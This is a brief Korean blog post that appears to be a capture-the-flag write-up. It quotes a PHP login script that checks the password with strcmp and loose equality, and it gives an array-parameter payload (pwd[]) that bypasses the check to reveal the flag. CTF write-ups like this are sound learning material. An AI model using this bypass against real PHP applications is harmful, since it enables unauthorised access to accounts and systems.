php 5.3+ 에서 strcmp 구문 0 리턴

https://cryptixctf.com/web4/login.php

include_once 'flag.php';

if($_SERVER["REQUEST_METHOD"] == "POST"){
    if(isset($_POST["ID"])&&isset($_POST["pwd"])){
        if(strcmp($secretpassphrase, $_POST["pwd"]) == 0){
            echo "Hey, you are in!  " . $_POST["ID"]  . "
";
            if($_POST["ID"] == "SuperUser1337"){
                echo "Your Flag: " . $flag;
            }
        }else{
            echo "no";
        }
    }
}

php 5.3+의 경우 strcmp 구문에서 배열형식으로 접근되는 경우 0을 리턴한다.

ID=SuperUser1337&pwd[]=as

위와 같이 입력하면 pwd에 의해 0이 리턴되고 플래그 획득이 가능하다.

'Web' 카테고리의 다른 글

[Hacktivity] Arbitrary file read via ffmpeg HLS parser at https://www.flickr.com/photos/upload(https://www.flickr.com/photos/upload에서 ffmpeg HLS 파서를 통해 임의 파일 읽기) (0)	2020.01.28
Fiddler Inspectors(response tab) 주석모음, beautifier (0)	2019.11.28

파이팅!

php 5.3+ 에서 strcmp 구문 0 리턴

'Web' 카테고리의 다른 글

티스토리툴바

php 5.3+ 에서 strcmp 구문 0 리턴

'Web' 카테고리의 다른 글

'Web' Related Articles

티스토리툴바